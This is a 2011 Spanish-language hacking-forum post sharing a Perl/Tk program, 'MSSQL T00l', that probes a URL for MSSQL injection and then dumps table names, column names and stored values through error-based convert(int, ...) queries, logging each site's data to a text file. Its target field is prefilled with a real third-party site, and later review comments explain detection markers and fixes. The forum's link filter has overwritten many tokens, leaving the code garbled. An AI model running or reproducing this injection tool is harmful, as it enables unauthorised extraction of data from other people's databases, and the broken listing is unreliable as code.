
[Perl Tk] MSSQL T00l


Desconectado BigBear

« en: Julio 03, 2011, 10:01:56 pm »
Hola, acá les dejo un programa para sacar tablas, columnas y valores en páginas
vulnerables a inyección MSSQL. Todos los registros del programa se almacenan en un archivo
de texto con el nombre de la web vulnerable.

Imagen





Código: Perl
  1. #!usr/bin/perl
  2. #MSSQL T00l (C) Doddy Hackman 2011
  3.  
  4. use Tk;
  5. use LWP::UserAgent;
  6. use URI::Split You are not allowed to view links. Register or Login(uri_split);
  7. use Win32;
  8.  
  # Start-up section: builds the shared HTTP client and the Tk main window, then enters
  # the Tk event loop. The listing is reproduced as posted; wherever the text
  # "You are not allowed to view links. Register or Login" appears, the forum's link
  # filter has overwritten a token, so the code does not parse as shown.
  # NOTE(review): `use` is processed at compile time, so the `if` below does not make the
  # Win32::Console import conditional; only the Free() call is guarded by the OS check.
  9. if ($^O eq 'MSWin32') {
  10. use Win32::Console;
  11. Win32::Console::Free();
  12. }
  13.  
  # One LWP::UserAgent is shared by every request (see toma): 5-second timeout and a
  # constant User-Agent string. Because the string never changes, it shows up unchanged
  # in the access log of any server the script contacts. As printed there is no space
  # between the Gecko date and "Firefox" - possibly a paste artefact, confirm against logs.
  14. my $nave = LWP::UserAgent->new();
  15. $nave->timeout(5);
  16. $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  17.  
  # Fixed-size, non-resizable main window.
  18. my $logo = MainWindow->new();
  19. $logo->title("MSSQL T00l (C) Doddy Hackman 2011");
  20. $logo->geometry("491x390+20+20");
  21. $logo->resizable(0,0);
  # In each place() call below one option name was overwritten by the forum's link filter.
  22. $logo->Label(-text=>"Target : ",-font=>"Impact1")->place(-x=>25,-You are not allowed to view links. Register or Login=>20);
  # Target URL field; it is created with a hard-coded URL as its initial text.
  23. my $targetero = $logo->Entry(-width=>50,-text=>"http://www.12manage.com/profile.asp?m=drarupbarman")->place(-You are not allowed to view links. Register or Login=>23,-x=>90);
  # Buttons: each -command is a reference to one of the subs defined further down
  # (start, getables, getcol, getdata, otherax).
  24. $logo->Button(-text=>"Test",-width=>8,-command=>\&start)->place(-You are not allowed to view links. Register or Login=>20,-x=>400);
  25. $logo->Label(-text=>"Options",-font=>"Impact1")->place(-x=>210,-You are not allowed to view links. Register or Login=>70);
  26. $logo->Button(-text=>"Get Tables",-width=>13,-command=>\&getables)->place(-You are not allowed to view links. Register or Login=>110,-x=>57);
  27. $logo->Button(-text=>"Get Columns",-width=>13,-command=>\&getcol)->place(-You are not allowed to view links. Register or Login=>110,-x=>144);
  28. $logo->Button(-text=>"Dump values",-width=>15,-command=>\&getdata)->place(-You are not allowed to view links. Register or Login=>110,-x=>231);
  29. $logo->Button(-text=>"Show Logs",-width=>15,-command=>\&otherax)->place(-You are not allowed to view links. Register or Login=>110,-x=>330);
  30.  
  31. $logo->Label(-text=>"Tables",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>200,-x=>60);
  32. $logo->Label(-text=>"Columns",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>200,-x=>190);
  33. $logo->Label(-text=>"Data",-font=>"Impact1")->place(-You are not allowed to view links. Register or Login=>200,-x=>330);
  34.  
  # Three result lists: table names, "table.column" entries, and dumped values.
  35. my $tablero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>230,-x=>40);
  36. my $columnero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>230,-x=>180);
  37. my $datero = $logo->Listbox(-width=>20)->place(-You are not allowed to view links. Register or Login=>230,-x=>320);
  38.  
  # Hands control to Tk; the subs below run only as button callbacks.
  39. MainLoop;
  40.  
  # start: handler for the "Test" button. Requests the URL from the target field with a
  # single quote appended and looks for a database driver error string in the response.
  # Takes no arguments and returns nothing useful; the result is shown in a message box.
  41. sub start {
  42.  
  43. my $page = $targetero->get;
  44.  
  # comer() yields the host part of the URL, used as the log file's base name.
  45. my $save = comer($page);
  46.  
  # $code is assigned without `my`, so it is a package global shared with the other subs.
  47. $code = toma($page."'");
  48.  
  # The verdict rests entirely on the response body containing raw driver error text.
  # A server that returns a generic error page gives this check nothing to match, and a
  # matching request is recognisable in logs by the trailing quote and the fixed User-Agent.
  49. if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
  50. savefile($save.".txt","\n\n[+] Page : $page\n");
  51. Win32::MsgBox("[+] The page is vulnerable to MSSQL Injection",0,"MSSQL T00l");
  52. } else {
  53. Win32::MsgBox("[-] Not vulnerable",0,"MSSQL T00l");
  54. }
  55. }
  56.  
  # getables: handler for the "Get Tables" button. Repeatedly requests the target URL with
  # a crafted suffix and reads one table name per response out of the database's
  # conversion-error message, filling the "Tables" list and the per-host log file.
  57. sub getables {
  58.  
  # The method name on these three lines was overwritten by the forum's link filter;
  # each call is applied to a listbox with the range ("0.0","end").
  59. $tablero->You are not allowed to view links. Register or Login("0.0","end");
  60. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  61. $datero->You are not allowed to view links. Register or Login("0.0","end");
  62.  
  63. my $page = $targetero->get;
  64. my $save = comer($page);
  65. savefile($save.".txt","\n");
  # bypass("--") matches neither named case in bypass(), so this presumably receives
  # ("+","--"): "+" as the word separator and "--" as the trailing comment marker.
  # $pass1/$pass2 are undeclared package globals.
  66. ($pass1,$pass2) =  bypass("--");
  # $sir accumulates the names already seen; it is undefined on the first pass.
  67. my $sir;
  # Hard cap of 666 requests, sent one after another from the GUI thread.
  68. for (1..666) {
  69. $logo->update;
  # Detection note: every request URL carries the literal text
  # "convert(int,(select<sep>top<sep>1<sep>table_name<sep>from<sep>information_schema.tables"
  # and grows on each pass as the NOT IN list is extended.
  70. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  71. #print "$path\n";
  72. $code = toma($page.$path);
  # The loop only yields data while the application echoes the database's
  # "value '...' to" conversion error to the client; parameterised queries remove the
  # injection point and generic error pages remove this readback channel.
  73. if ($code=~/value '(.*?)' to/ig) {
  # The captured text is interpolated unescaped into the next request and the log.
  74. $sir.= ",'".$1."'";
  75. $logo->update;
  76. savefile($save.".txt","[+] Table : ".$1);
  77. $tablero->insert("end",$1);
  78. } else {
  # First response without a match ends the run (this is also the path taken on a
  # timeout or an unrelated page, since no HTTP status is checked).
  79. $logo->update;
  80. Win32::MsgBox("[+] Finished",0,"MSSQL T00l");
  81. last;
  82. }
  83. }
  84. }
  85.  
  86.  
  # getcol: handler for the "Get Columns" button. For every table selected in the
  # "Tables" list it runs the same error-readback loop as getables, this time against
  # information_schema.columns, and adds "table.column" entries to the "Columns" list.
  87. sub getcol {
  88.  
  # Method name overwritten by the forum's link filter; called with ("0.0","end").
  89. $columnero->You are not allowed to view links. Register or Login("0.0","end");
  90. my $page = $targetero->get;
  91.  
  92. my $save = comer($page);
  93. savefile($save.".txt","\n");
  94.  
  # The selection is dereferenced as an array ref below; $d is an undeclared global.
  95. $d = $tablero->curselection();
  96.  
  97. for my $id (@$d) {
  98. my $table = $tablero->get($id);
  99.  
  100. savefile($save.".txt","[+] Table extract : ".$table."\n");
  101.  
  # Presumably ("+","--"), as in getables - see bypass().
  102. ($pass1,$pass2) =  bypass("--");
  # Names already seen for this table; reset for each selected table.
  103. my $sir;
  104. for (1..666) {
  105. $logo->update;
  # The table name comes from the listbox, i.e. from an earlier server response, and is
  # placed between quotes without escaping. In request logs the marker for this stage is
  # "column_name ... information_schema.columns" inside convert(int,( ... )).
  106. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$table."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  107.  
  108. $code = toma($page.$path);
  # Same dependency as getables: works only if the conversion error text is returned.
  109. if ($code=~/value '(.*?)' to/ig) {
  110. $sir.= ",'".$1."'";
  111. savefile($save.".txt","[+] Column : ".$1);
  # Stored as "table.column"; getdata splits this string again.
  112. $columnero->insert("end",$table.".".$1);
  113. } else {
  # Runs once per selected table, so the message box appears once for each of them.
  114. $logo->update;
  115. Win32::MsgBox("[+] Finished",0,"MSSQL T00l");
  116. last;
  117. }
  118. }
  119. }
  120. }
  121.  
  # getdata: handler for the "Dump values" button. For every "table.column" entry
  # selected in the "Columns" list it reads that column's values one request at a time
  # through the same conversion-error channel, filling the "Data" list and the log file.
  122. sub getdata {
  123.  
  124.  
  # Method name overwritten by the forum's link filter; called with ("0.0","end").
  125. $datero->You are not allowed to view links. Register or Login("0.0","end");
  126. my $page = $targetero->get;
  127. my $save = comer($page);
  128. savefile($save.".txt","\n");
  # Dereferenced as an array ref below; $d is an undeclared global.
  129. $d = $columnero->curselection();
  130.  
  131. for my $id (@$d) {
  132. my $tablex = $columnero->get($id);
  133.  
  134. savefile($save.".txt","[+] Dump : ".$tablex."\n");
  135.  
  # Greedy first group: the split happens at the LAST dot, so a table name containing a
  # dot stays intact but a column name containing one would be cut.
  136. if ($tablex=~/(.*)\.(.*)/) {
  137. my $table = $1;
  138. my $c = $2;
  # Presumably ("+","--") - see bypass().
  139. ($pass1,$pass2) =  bypass("--");
  140. my $sir;
  # At most 666 values are read per column; anything beyond that is silently skipped.
  141. for (1..666) {
  142. $logo->update;
  # Table and column names are inserted as bare identifiers. Values that are already
  # numeric would not raise a conversion error, so such columns presumably end the loop
  # at once - NOTE(review): inferred from the convert(int, ...) wrapper, not shown here.
  143. $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$c.$pass1."from".$pass1.$table.$pass1."where".$pass1.$c.$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
  144. #print "$path\n";
  145. $code = toma($page.$path);
  146. if ($code=~/value '(.*?)' to/ig) {
  # A value containing a single quote is appended unescaped and would break the
  # NOT IN list on the next request.
  147. $sir.= ",'".$1."'";
  # Extracted values are written in clear text to the per-host log file.
  148. savefile($save.".txt","[+] $c : ".$1);
  149. $datero->insert("end",$1);
  150. } else {
  151. $logo->update;
  152. Win32::MsgBox("[+] Finished",0,"MSSQL T00l");
  153. last;
  154. }
  155. }
  156. }
  157. }
  158. }
  159.  
  # otherax: handler for the "Show Logs" button. Builds the string
  # "start logs/webs/<host>.txt" from the current target field and passes it to a call
  # whose name was overwritten by the forum's link filter.
  160. sub otherax {
  161. my $page = $targetero->get;
  162. my $file = comer($page);
  # NOTE(review): $file is the authority part of whatever text is in the target field and
  # is interpolated into the command string without quoting or validation.
  163. You are not allowed to view links. Register or Login("start logs/webs/$file".".txt");
  164. }
  165.  
  166.  
  # toma: issues an HTTP GET for the URL in $_[0] through the shared $nave client and
  # takes the response body via ->content. The leading token was overwritten by the
  # forum's link filter. No status code or error is checked, so a failed or timed-out
  # request is indistinguishable from a page without a match.
  167. sub toma {
  168. You are not allowed to view links. Register or Login $nave->get($_[0])->content;
  169. }
  170.  
  # savefile: appears to append $_[1] plus a newline to the file logs/webs/<$_[0]>.
  # The first token on each of the three lines was overwritten by the forum's link filter.
  # NOTE(review): the mode and the path are joined into a single string and the handle
  # SAVE is a bareword; no failure check is visible, and nothing here creates the
  # logs/webs directory. The file name derives from the target URL's host part.
  171. sub savefile {
  172. You are not allowed to view links. Register or Login (SAVE,">>logs/webs/".$_[0]);
  173. You are not allowed to view links. Register or Login SAVE $_[1]."\n";
  174. You are not allowed to view links. Register or Login SAVE;
  175. }
  176.  
  # comer: splits the URL in $_[0] with uri_split and uses the authority (host[:port])
  # component; callers use it as the base name of the log file. The token before $auth
  # was overwritten by the forum's link filter. The other four components are unused.
  177. sub comer {
  178. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
  179. You are not allowed to view links. Register or Login $auth;
  180. }
  181.  
  # bypass: maps a marker in $_[0] to a pair of strings that callers assign to
  # ($pass1,$pass2) and use as word separator and query terminator. The token before each
  # pair was overwritten by the forum's link filter. Every caller in this listing passes
  # "--", which matches neither named case, so only the final ("+","--") pair is used.
  182. sub bypass {
  183. if ($_[0] eq "/*") { You are not allowed to view links. Register or Login ("/**/","/*"); }
  184. elsif ($_[0] eq "%20") { You are not allowed to view links. Register or Login ("%20","%00"); }
  185. else {You are not allowed to view links. Register or Login ("+","--");}}
  186.  
  187. # ¿ The End ?
  188.  
« Última modificación: Julio 17, 2011, 03:42:04 am por Sthefano02 »

 
